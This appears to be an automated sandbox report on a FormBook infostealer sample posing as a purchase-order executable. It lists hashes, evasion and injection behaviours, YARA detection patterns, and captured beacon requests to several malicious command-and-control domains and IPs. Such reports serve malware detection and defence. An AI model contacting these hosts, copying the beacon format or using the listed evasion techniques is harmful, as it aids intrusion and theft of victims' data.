Play interactive tour

Edit tour

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name:	Purchase Order 40,7045$.exe
Analysis ID:	321389
MD5:	ba4f1b472cb69d8a3924d88dacf1b833
SHA1:	622cdccdc0f020d368a87c5eff9ec1a1259e21c7
SHA256:	2a694c3a8347816b2f85e036b1064e410ad1578185a0608416944199ef72b82c
Tags:	exeFormbookYahoo
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Purchase Order 40,7045$.exe (PID: 6708 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: BA4F1B472CB69D8A3924D88DACF1B833)

MSBuild.exe (PID: 6748 cmdline: {path} MD5: D621FD77BD585874F9686D3A76462EF1)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

raserver.exe (PID: 7048 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)

cmd.exe (PID: 6200 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x108e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10c82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x79d48:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7a0e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1c595:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x859f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1c081:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x854e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1c697:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x85af7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1c80f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85c6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1168a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x7aaea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1b2fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8475c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x12402:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x7b862:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x21677:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x8aad7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x226ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1e599:$sqlite3step: 68 34 1C 7B E1 0x1e6ac:$sqlite3step: 68 34 1C 7B E1 0x879f9:$sqlite3step: 68 34 1C 7B E1 0x87b0c:$sqlite3step: 68 34 1C 7B E1 0x1e5c8:$sqlite3text: 68 38 2A 90 C5 0x1e6ed:$sqlite3text: 68 38 2A 90 C5 0x87a28:$sqlite3text: 68 38 2A 90 C5 0x87b4d:$sqlite3text: 68 38 2A 90 C5 0x1e5db:$sqlite3blob: 68 53 D8 7F 8C 0x1e703:$sqlite3blob: 68 53 D8 7F 8C 0x87a3b:$sqlite3blob: 68 53 D8 7F 8C 0x87b63:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Purchase Order 40,7045$.exe PID: 6708	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.MSBuild.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.MSBuild.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.MSBuild.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15289:$sqlite3step: 68 34 1C 7B E1 0x1539c:$sqlite3step: 68 34 1C 7B E1 0x152b8:$sqlite3text: 68 38 2A 90 C5 0x153dd:$sqlite3text: 68 38 2A 90 C5 0x152cb:$sqlite3blob: 68 53 D8 7F 8C 0x153f3:$sqlite3blob: 68 53 D8 7F 8C
1.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.MSBuild.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.MSBuild.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16089:$sqlite3step: 68 34 1C 7B E1 0x1619c:$sqlite3step: 68 34 1C 7B E1 0x160b8:$sqlite3text: 68 38 2A 90 C5 0x161dd:$sqlite3text: 68 38 2A 90 C5 0x160cb:$sqlite3blob: 68 53 D8 7F 8C 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.allmm.info/igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0	Avira URL Cloud: Label: malware
Source: http://www.forbigdogs.com/igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Show sources

Source: Purchase Order 40,7045$.exe

ReversingLabs: Detection: 18%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: Purchase Order 40,7045$.exe

Joe Sandbox ML: detected

Source: 1.2.MSBuild.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then pop edi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49747
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49756
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49758
Source: Traffic	Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49759

Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allan-wren.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.theoutdoorbed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.pasumaisangam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.lotoencasa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.guidesgold.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.thoughtslate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.erpsystem.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.forbigdogs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.rockinglifefromhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allmm.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 81.169.145.95 81.169.145.95
Source: Joe Sandbox View	IP Address: 185.201.11.126 185.201.11.126

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: IOFLOODUS IOFLOODUS

Source: unknown	TCP traffic detected without corresponding DNS query: 104.42.151.234
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 104.79.89.181
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 84.53.167.113
Source: unknown	TCP traffic detected without corresponding DNS query: 84.53.167.113
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 40.67.254.36
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 40.67.254.36
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 104.79.89.181
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
